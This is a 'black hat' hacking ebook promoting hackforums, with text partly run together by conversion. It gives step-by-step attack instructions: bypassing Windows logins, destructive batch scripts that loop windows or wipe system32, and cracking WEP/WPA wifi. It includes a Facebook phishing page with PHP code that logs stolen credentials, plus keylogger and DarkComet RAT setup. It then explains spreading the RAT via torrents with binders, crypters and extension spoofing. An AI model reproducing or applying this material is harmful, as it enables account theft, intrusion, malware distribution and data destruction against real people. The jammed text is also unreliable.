Académique Documents
Professionnel Documents
Culture Documents
By CyberGod
Index : - Introduction -Chapter 1: Making it clear -I-The world "HACKER" -II-Different types of Hackers -a-Black hats -b-White hats -c-Grey hats -Chapter 2: The first steps -I-Beginners fun -a-Windows User passwords -b-Getting admin -c-Changing IP and VPNs -d-Batch virus -II-Wifi hacking -a-WEP -b-WPA/WPa2 -III-Online accounts hacking -a-Phishing -b-Keyloggers -c-RATs -Chapter 3: Because "Chapter 2" is too easy ! [These chapters will be included in Part 2 of the eBook] -I-Websites Attacks: -a-SQL injection -b-XSS/cross site scripting -c-DOS/DDOS -d-Defacing -II-Next level: Botnet -III-Worms ?? -IV-Booters -Chapter 4:Some coding and programming -I-Intro -II-Stealers -a-Builder -b-stub -III-Loggers -a-Builder -b-Stub -IV-Crypters -a-Builder -b-Stub -c-Runtime module -Chapter 5:Pentesting and backtrack -I-Introduction to penetration testing -II-Network scanning and information gathering -III-Social engineering toolkit and DNS spoofing -IV-Metasploit: -a-Intro -b-payloads/stager -c-meterpreter -Chapter 6:Extra : To keep your ass out of troubles -Chapter 7:From a hacker to another.
Helloandwelcometohackingworld,
thisebookwaswrittenbyCyberGodtohelpany neworintermediatehacker.Thisisn'tan informativebooknorahackingdictionary,but insteadyoucanconsideritlikeateacherthat willhelpyouthroughyourjourney,thismean thateverythingyoulearnfromthisbookcanbe appliedanduseddirectlyandnotjust informationaboutvarioussubjects. Nowthatyouknowwhatyouwillbereading,I wouldliketomentionthatIamnotresponsible foranyactionyoumakebasedonwhatyou learnedfromthisbook.AndIwouldliketo thankthewholeHFawesomecommunity,if youdownloadedthisbookfromsomewhere elseandyouarenotamemberofHFissuggest yougoandregisterforanaccountrightnow. http://www.hackforums.net
Chapitre1:Makingit clear.
I.Theworld'Hacker'
Youwanttobeahacker?ok...butfirstthingsfirst,so whatdoestheworld'hacker'referto? Usuallyahackerisapersonwithagreatknowledgein informaticand/orelectronics,andbygreatImeanmore thenanaverageperson.Nowwhenmostpeoplehearthe worldhackeritisassociatedwithevilandbadactionslike hackingbankaccountsorwebsites....Butyoumustknow thatnotallhackersusetheirknowledgeforbadthings.A hackeractivities:accountshacking,pentesting, programming,RATs/Botnet,makingmoney....Andabunch more.BeforeendingthissmallsectionIwouldliketosay thatanyonewhowantstobeanadvancedorexpert hackermustlearnhowtoprogramandcodeinseveral language,foratotalnewbieIsuggeststartingwith somethinglikeHTMLorVB.nettheseareeasytolearn.
II.Differenttypeofhackers
aBlackhats Blackhathackersarethebadguys,andyoumustknow thisisablackhatbook.blackhathackersusuallytryto hackintoalltypeofaccountsfromonlinebanksand paypaltofacebookandmsn,usingdifferentmethodslike RATs,keyloggersandfakepages.Amoreadvancedblack hathackerwillwanttowritehisowncryptersandRATs andtrytobuildahugebotnettotakedownserversand websites. Blackhathackersarealwaystryingtobreackanysecurity systemorbypassingAVandfirewalls,someofthemalso liketousesocialengineeringtotrickpeoplesintotheir traps. Thecauses?WellIcanonlythinkoftwomaincauses: makingmoneyorprouvingthemselfandaquiringforbiden knowledge.
Chaptre2:Thefirst Steps
I.Beginnersfun
aWindowsUserPasswords Inthischaptreyouwilllearnhowtoremoveanyuser passwordusingwindowsoperatingsystem.Iknowthis maysoundnoobortooeasyforsomebutforabeginner thiswillbeanexcellentfirstlesson. BeforegoingdirectlyintoactionIwouldliketoexplain howwearegoingtoremovethatpassword.BythewayI willbeshowingyou2methods.Firstoffallyoumustknow thatwindowsuserpasswordarestoredontheHDsousing asimplebootableprogramwecanhavefullaccesstothat HDandremovethepasswordthenbootagaininto windows,don'tworryifyoudidn'tunderstandaword becauseIwillexplaineverything.Thesecondmethodcan beusedonlywithawindowsXPoperatingsystem,what youactuallydoislogintothehiddenunprotecteduser
"administrator"andremovethepasswordoftheother usersfromthere.
.1.
Enoughtalkingletsgettoaction,Iwillexplainthesecond methodfirst.Assumingyourontheloginscreenandyour askedforthepassword,allyouhavetodoispress ctrl+alt+delthenkeepingthectrlandaltpressed,release thedelbuttonthenpressitagain.Youshouldbe presentedwithaloginformwhereyoucanenterauser andapassword,intheuserwrite"administrator"without andleavethepasswordfieldblanknowyoushouldbeable tologintotheadministratoruser.Oncethereyoucan removeanyotheruser'spasswordwithoutknowingthe oldone,finallyyoushouldknowthattheuser administratorcanbeprotectedbyapasswordsothis methodwontworkanymore,butindefaultitcomeswith nopasswordandmostpeopledon'tknowaboutthatuser soin99%ofthetimeitwillbeunprotected.
.2.
Nowfortheothermethod.YouwillneedablankCDor DVD,acd/dvdandaburningsoftware;Iamgoingtobe usingNerobutyoucanuseanyotherburningsoftware. NowifyouareinNerochoose"burnimage"andselectthe "passwordreset.iso"providedinthe"Files"folder.Inserta blankCDandclickburn,youshouldendupwitha bootableCD.Iwanttomentionthatwecanalsouseausb insteadofaCD,justfollowtheinstructionbrovidedbythe "README.txt"insidetheisoimage. ThenextstepwouldbetobootfromtheCD/DVD/USB,for thatyouhavetoinsertyouCD/DVD/USBthenrestartyour computer,andfollowoneoftheinstructionsbelow: Whenthecomputerisstartingyouwillgetamessage similartothat"pressF1toenterBIOSsetup"F1isn'tthe standarkeyforallBIOSitvaryfromonetoanother.To enterthesetupsimplypressthecorrectkey.Nowinthe BIOSgotothetab"Startup"or"Boot"andchangethe bootorder,ifyourbootingfromaCDorDVDputthe CD/DVDdriveatposition1,ifyouwanttobootfromaUSB stickthenchoosethecorrespondantdeviceandputitat position1.
IntheabovepictureIchosetheDVDdevicetobe#1.Next youneedtosaveandexit.Afterthesetupexityour computershouldrebootanditwillbootfromtheCD, pressenterandwaitfortheprogramtoload. Thefirstthingyouwillbeaskedistochoosethecorrect partition,thismeanifyourHDDisdevidedintoseveral partion(ex:C:\andD:\)youneedtochoosethesystem partition(theonecontainingthe"windows"folderand files),inmycaseitisnumber"2",soIwilljusttype"2"and hitenter.
Nowchoose"Passwordreset"whichisnumber"1".
Then"Edituserdataandpasswords"
Gettingadmin ThatisactuallyprettysimpleonaWindowsmachine,you willlearn2differentwaystodoit.Andifyouareasking whyIamalwaystargetingWindowsmachines,thenthe answerwouldbebecauseWindowsisthemostused operationsystemandtheeasiesttohack.Nowtoaction. Methode1:YouaregoingtouseCMDoralsoknowas commandprompt.Formethismethodeisuselessbecause youneedtobeadministratorinthefirstplace,allitdoesis addanotheradministratoruser,butitcancomeinhand somedayiftheaccountyourinismonitoredorhavesome restriction,Idon'tknow...Hereiswhatyouneedtodo opencmdbygoindto"Run"thentypeCMD.exeoropena notepadandtypein: "cmd" Withoutquotesandthensaveitasanything.BATitis importanttoadd.batattheendofthenamesoitis treatedasabatchfile. OnceiinCMDtype: netlocalgroupAdministrators<username>/add replace<username>withthenameyouwantandpress
cChangingIPaddressandVPNs WhywhouldIwanttochangemyIP?andwhatisaVPN? wellIwillansweryourquestionrightnow.Ifyouaregoing tohackawebsiteorRATsomeoneyouobviouslydon't wanttobetrackedsochangingyourIPisgoingtohelpyou alot.ChangingyourIPcanalsohelpbypassingsome restrictionslikeabannedIP. NowfortheVPNpart;VPNstandforVirtualPrivate Network,usingaVPNservicewillcreateaprivate encryptedconnectionbetweenyouandtheproviderthis meanthatnoonecaninterceptyourconnectionandif someonetracedyoubackitwillleadhimtotheVPN providerandnottoyourpersonalcomputer. IwilltalknolongeraboutVPN,becauseitiseasytoget one,thereissomefreeVPNouttherebutthebestones chargesformoney. NowhowtochangeyourIP;youaregoingtoneedaproxy changerprogramandaproxylist.Aproxyissimplyan IP+portyouusethatporttoconnecttotheIPanduseit.I willbeusingaprogramcalled"Proxyswitcher",itisapaid programbutIprovidedyouwithacrackedcopy,youcan findinin"Files"underthename"ProxySwitcher.rar".
Nowfollowtheinstructions: 1InstallingProxySwitcher: FirstextracttherararchiveandinstallProxyswitcher, aftertheinstallationisdonerightclickonProxyswitcher iconintaskbarandclick"registerproxyswitcher"useany namewiththekeyIprovidedinkey.txt.Nowexitproxy switcherthenlunchitagainandyouareoktogo. 2findingfreshproxy:Wellthispartismorelikeagoogle searchyouneedtosearchfor"proxylist"or"freshproxy list"oryoucanusetheProxyswitcheritselftoseachfor proxysforyouhereishowyoudothat. .a.UsingProxySwitcher: Richtclickonthetaskbar>ShowManager
Nowclickthe"Commontaskwizard"
Click"Next"thenchoosethefirstoptioninthecommon tasksandclickfinish.
Thenwaitfortheprogramtogettheproxythenscanthen andyouwillhavealistofdeadandworkingproxysnow doubleclickonanyworkingoneandyouaregoodtogo. Note:Sometimeyourinternetconnectionmaygetslower basedonthespeedoftheproxyserver.Andyouwont alwaysfindproxyusingProxyserversoIprefersearching ingoogle. .b.UsingGoogle(Better): Simplegotogoogleansearchforfrechproxylist,getany listthatyouthinkisfreshthencopyittoanotepadand saveit.NowgotoProxyswitcher>File>Importfrom textfile...andchoosethetxtfileyousavethelistin.
Nowclickonnewandyoushouldhavealistonunchecked proxys.
ClickonTestproxyserversforavailibility.Andwaitforthe scan.
shellscript.[2]
@echoOFF
{Hidestheechooffreport.}
%digit {Digit:anydigitfrom0to9.%0hasthe valueofthebatchcommandasitappearsonthe commandlinewhenthebatchisexecuted.%1represents thefirststringtypedafterthebatchcommmand.Each occurrenceof%digitisreplacedbythecorresponding stringfromthebatchcommandline.} examples MYBATCHDOCA: {Copiesall.DOCfilesinthedefault
COPY*.%1%2
directorytodriveA:}
echo%PATH% currentsearchpath.}
{DisplaysthevalueofPATH,the
echo%PROMPT% {DisplaysthevalueofPROMPT,
thecurrentpromptstring.}
cls
echoON {Restoresnormaldisplayactivity.}
echoOFF commands.}
{HaltsdisplayofDOSpromptand
echo%USER%{DisplaysthevalueofUSERonthe screen.}
echo.
{Displaysasingleblanklineonthescreen.}
gotoLABEL :LABEL
if[not]conditioncommand {Condition:errorlevel number;string1==string2;orexistfilename.Command: anyDOScommand,batchcommand,batchfilename,or programname.} examples if[not]errorlevelnumbercommand {Errorlevel:anexitcodereturnedbyaprogramoran externalcommand.ThefollowingDOScommandsreturn anexitcode:BACKUP,RESTORE,FORMAT,REPLACE,and XCOPY.Number:anumericalvalue(integer)againstwhich theexitcodeiscompared.TheconditionisTRUEiftheexit codereturnedbythepreviousprogramisgreaterthanor equaltonumber.TheconditionisFALSEiftheexitcodeis
lessthannumber.}
if(%1)==(LTRS)CDC:\WORD\LTRS
{Ifthefirst
parameterisLTRS,thechangedirectorytoLTRS.}
ifexistD:\%1\nulCD%1
{Testsfortheexistence
ofdirectory%1evenifitcontainsnofiles,thenchangesto thatdirectoryifitexists.}
pause<nul
{Waitswithnocomment.}
REM
Addsremarkstoabatchfile.
setUSER=John string,"John".}
{SetsthevalueofUSERtothe
setUSER= environment.}
{RemovesUSERfromthe
setPATH=C:\;C:\DOS currentsearchpath.}
{SetsC:\;C:\DOSasthe
Miscellaneous
command>nul oblivion.}
{Redirectscommandoutputto
command>file file.}
{Redirectscommandoutputto
command<file
{Redirectsfileoutputto
command.}
CD {Displaysthecurrentdirectoryanditspath.}
%% {Aliteral"%".}
Endoflist
adding".BAT"attheendisamustdosoitsavethefileas batch. 1openendlesswindows: @echooff startfile.bat gotofile.bat #Howthecodeworks:"file.bat"isthenameofyourbatch fileyoucanchngeitifyouwant. "startfile.bat":openthefile.bat "gotofile.bat":gotothepreviouslineandopenanother windows.Sothisisanendlessloopofopeningwindows andthebestpartisthateverynewwindowswillstart openingnewwindowsalso.Thiscancrashanoldweak computer. 2Deletefileorfolder @echooff del/q"c:\windows\system32" Thesetwolinesmayappearprettysimplebutcanhavea devastatingeffectonaWindowsoperatingsystem.We
aresimplyusingthe"del"commandtodeleteaspecific foldercontants,inthiscase"system32"folder.Thetricky partisthe"/q"after"del",addingthiswillseletethefiles withoutaskingtheuserforcomfirmation. 3Shutdowncomputer Usage:shutdown[i|l|s|r|a][f][m \\computername][txx][c"comment"][dup:xx:yy] Noargs Displaythismessage(sameas?) i l s r a DisplayGUIinterface,mustbethefirstoption Logoff(cannotbeusedwithmoption) Shutdownthecomputer Shutdownandrestartthecomputer Abortasystemshutdown
II.WifiHacking
InthissectionIwillshowyouhowtocracktwodiffrent typeofwifiencryptions,WEPandWPA/WPA2.Inboth sectionswewillbeusingbacktrack5R2soifyoudon't haveitgodownloaditnowitisfreefromtheofficialsite,I useKDE32bitbutanyotherversionofBT5willdoit.For whodon'tknowwhatisBacktrack:"BackTrackisaLinux basedpenetrationtestingarsenalthataidssecurity professionalsintheabilitytoperformassessmentsina purelynativeenvironmentdedicatedtohacking." Hereistheofficialwebsite:http://www.backtrack linux.org/ DownloadbacktrackthenburnittoaDVDandboot.Once yourintype"Startx"tochangefromtextlogintographical login. Backscreenfix: 1)inserttheDVDlive 2)inthegrub(Whenaskedtochooseabootoption)press TABtoeditboot 3)youwellseesomthinglikethis
file=/cdrom/preseed/ubuntu.seedboot=casper initrd=/casper/initrd.gz addxforcevesanoapicnoapcinosplashirqpoll after initrd.gz Thisshouldfixtheproblem. Wep Wepisrelativelyeasytocrack,specialywithBT5and "Gerixwifihacker".Onemorething,ifyouwantto experimentallaricrackfeaturesyouwillneedtohavea compatiblewirelesscard,IsuggestAlfaNetworkwireless adapters. FirstweneedtoopenGeriswificracker."Backtrack> ExploitationTools>WirelessExploitationTools>WLAN Exploitation>gerixwificrackerng"
Anewinterfaceshouldappearunderthename"mon0" having"Monitor"asMode.Ifthatdoesn'thappenorifthe Modeisn't"Monitor"thenprobablyyourwirelesscard isn'tcompatible.Anywayletsmoveon,nowselectthe newmonitoredinterfaceandclick"Rescannetworks".You willgetalistoffallwirelessnetworksnearyou,Essidisthe nameofthenetworkandBssidisthemacaddress,youwill needalsetocheckthe"Enc"(encryption)tab,forthispart thenetworkshouldhavea"WEP"encryption.Selecta compatiblenetworkandmovetothe"WEP"tab.
Cons NeedmoreinformationtolaunchitIEIPaddressinfo. Quiteoftenthiscanbeguessed.Betterstill,aireplayng assumessourceanddestinationIPsof255.255.255.255if nothingisspecified.Thiswillworksuccessfullyonmost APs.Sothisisalimitedcon. Setuptoexecutetheattackismoresubjecttothedevice drivers.Forexample,Atherosdoesnotcgeneratethe correctpacketsunlessthewirelesscardissettothemac addressyouarespoofing.
Now"StartSniffingandLogging".
>Waiting forclientdeauthentication.
thefile'sname)andclick"AircrackngCrackWPA password".
Almostdone,ifyourdictionarycontainsthepassword aircrackshouldbeabletodecryptit.
Thisconcludethesecondsectionofchapter2.
II.Onlineaccounts. (Facebook,hotmail,gmail...)
Ifyouhavenoideaoranypreviousexperienceabout accountshackingthenREADthis: 1Aprogramorasoftwarethatautomaticallyhack accountsbygivingitusernameoremaildoes
NOT
exist,sopleasedon'tbefooledbythefakeyoutube videos. 2SocialEngineering:alsoknownasSEistheartof manipulating/trickingpeoples;usuallyusedtogetsome informationfromthevictimortrickthemintofakelogin/ keyloggers.... 3HackingaccountsISacybercrimeandcangetyouinjail insomecountrys. 4"Ohhnomyfacebook/hotmail....accountwashacked, howcanIhackitback?"Stopwhiningaboutandusethe passwordrecoverybutton,itisloteasierthenhackingthe personwhohackedyouinthefirstplace.
5Thesetutorialsareforeducationpurposesodon't abusethisknowledgeforpersonalrevenge. Enoughsaidletsmoveintoaction. aPhishing Aphishingpageisafakeloginpagethatlooksexactlylike theoriginalonebutonceyouloginitwillsendthe usernameandpasswordtothehacker.Itisprobablythe easiestandmostefficientwaytohackanaccount,but requiremoreSEthentheother. 1Whatyouwillneed: Free/paidwebhosting. ....Yes,thatisallyouwillneedinadditiontoabrainanda computerofcourse. 2Makingthefakepage: aChooseawebsite,IwillgowithFacebook,ifyoudon't haveanyknowledgeofhtmlandphpcodingsticktomy exemplesoyoufollowmeeasily. bGotothewebsiteloginpage,inmycaseitis facebook.comorfacebook.com/login.phpbothpageshave aloginform.Thenweneedtogetthewebpagesource
code,ifyouareusingfirefoxjusrrightclickandselect "ViewPageSource"oryoucanpressCtrl+U.Copyall codethenpastitinnotepad++ornotepad. cNowweneedtocreateaphpfilethatwillreceivethe message(email/pass)sentbythepageandwriteittoa textfile.Sogoonandopenanewnotepadwindowsand copypastthiscode. <?php header('Location:http://'); $handle=fopen("logs.txt","a"); foreach($_POSTas$variable=>$value){ fwrite($handle,$variable); fwrite($handle,"="); fwrite($handle,$value); fwrite($handle,"\r\n"); } fwrite($handle,"===============\r\n"); fclose($handle);
exit; ?> Youcanedit: Theredirectionlocationinthesecondlineafter "Location:" Textfilenameholdingtheemailsandpasswordsinline3 originalname"logs.txt" Afteryouhavesettheseoptiontoyourlikingsaveitas something.php(Iwillnameitaction.php) dUploading:Firstyouneedtocreatanaccountwith webhostingservicehereissomefreeones: 7ry.us 000webhost.com freewebhostingarea.com zymic.com Afteryouhavecreatedandaccountcreateafreedomain thenlogintoyourdomain.
Nowinyoudomaincpanelsearchforyourftplogininfo, andsavethensomewherethenlogout.
GoogleFilezillaanddownloaditthenusetheftploginyou gotfromyourhosttologin.
Thiswillgiveyoutheftplinkbutweneedtogetthehttp link,followthis. ftp:ftp://user@domain/fileteh/action.php togetthehttplinnkremoveeverythingbeforethe@ includingthe@.Alsoifinthelinkthereisreferenceto "public_html"removeit. Somyhttplinkwillbe:http://domain/fileteh/action.php eBacktothepagecode;weneedtosearchthecodefor thepartabouttheloginformmorespecificlyforthecode thatsendstherequesttotheserver.ForFacebooksearch thecodefor: action="https://www.facebook.com/login.php? login_attempt=1"
Makesurethiscodeisintheform"login_form".
Nowreplacethelinkafteraction="withyourphpfilelink ("http://domain/fileteh/action.php")
Theninthe"Forwardthisdomainto"insertthelinktothe sakepage.
THEEND
bKeyloggers 1Whatisakeylogger? Akeyloggerruninsilentmod(hidden)ontheslave'spc andwillrecordallpressedkeysinadditionto screenshots/webcameandthensendthelogstothe hacker.Keyloggersareusedtostealpasswordsorspyon comversationsanduser'sactivities. 2HowtosetupaStealer+Logger? Iwillbeusing"UnknownLoggerPublicV1.5"locatedin theFilesfolderunderthename:"UnknownLoggerPublic V1.5.rar"
(Creditsgoesforunknownsfromhackforums.netforthatgreatfreelogger.)
Fortheemaildelivery:
Ifyouchekyourlogsfileoryouremailyoushouldgetthis.
cRemoteAdministratorTools 1WhatisaRAT? RATstandforRemoteAdministratorToolorRemote accessTrojan,itamalwareprogramthatwouldgivethe hackeraccesstothevictim'scomputer.RATusuallyspread intorrentsandpirated/fakesoftwares.Asysteminfected byaRATispartofaninfectednetworkcalledbotnet.A botnetcanhaveseveralgoals,mostcommon: money DDOS(Attackswebsites) 2HowtosetupDarkCometRAT? Darkcometisoneofthebestfree(public)RATs,butasa publicRATitiseaslydetectedbyAVsoconsiderusinga crypter. GeneralideaonhowtheRATwillwork:Thereistwopart inaRAT,aclientandaserver;Theserverissenttothe victimtoinfectthecomputer,thentheserverwilltryto establishaconnectionwiththeclient.Theclientreceive theconnectionandcommunicatebackwiththehacker's commands.Itisverysimilartomultiplayergamesaperson createagame(Client)andtheotherplayersconnecttoit
(server). TheserverwillneedandIPaddressandaporttoconnect totheclient,assomeofusdon'thaveauniqueIP(IPcan changeeverytimeyouconnecttotheinternet)wewilluse aDNShost.ThismeantheserverwillconnecttotheDNS hostthenwillberedirectedtoyourIP,andyoucanupdate yourDNShosteverytimeyourIPchange. Whatislefttodoisportforwardingyourrouter,this meansopenporttoallowtheservertoconnect. a)NoipDNShost TogetafreeDNShost,weneedtosignupatwww.no ip.com,onceyousignupgoonandlogintoyouraccount. Thenclickon"AddaHost".
EnterahostnameandleavethehosttypetoDNSHost(A) thenclick"CreateHost".
Setthesettingasshowsintheabovepicture,youhaveto change"IP/DNS"tothenoipDNShostyourcreated earlier;youcanalsochangetheportandtheiconifyou want.Nowclicknormaltobuildtheserve. c)Letsopensomeports. Beforewecanstartlisteningforconnectionsweneedto opentheportweusedfortherserverinmycase"1604". ThiscanbeveryifyourroutersupportUpNP,anyway followthesesteps: GotoSocket/NettabinDarkComet,thenrighclickand addport.
Enteryourportnumberandmakesure"Trytoforward automaticaly(UpNP)"ischecked,thenclick"Listen".
yourroutermanually(itisprettyeasy): http://portforward.com/routers.htm d)Listening Forconnectiononaspecifiqueportallyouneedtodois gotoSocket/Nettabandaddaport(Sameasinthe previousstep)andifyouprotectedyourserverconnection withapassword(canbeusedonlyinFulleditormode)go toDarkCometRAT>Clientsetting>Generalsettingsand enterthepasswordin"Trafficencryptionmergedkey (password)"
TouninstalltheRATfromyourmachinerightclickthe user>UninstallServer(s)
3Spreading(Sameasforthekeylogger) You will need to makeitFUD (Fully UnDetectable) so thatitisnotdetectedanddeletedbyAV.Todothisyou willneedaFUDcrypterIdidnotincludeonewiththebook becauseaprivateFUDcrypterwillcostyoumoney. Yournextstepistofindsomeplacetospreaditone, usuallytorrentsarethebestfindanewfresh prgram/game/crack/movie...downloadit,useabinderto bindthefilewithyourRATserverandstartspreading. Youcanalsouseextensionspooferifyouarespreading theserverwithoutbindingitwithanotherapplication,this willmakeitlooklesssuspecious.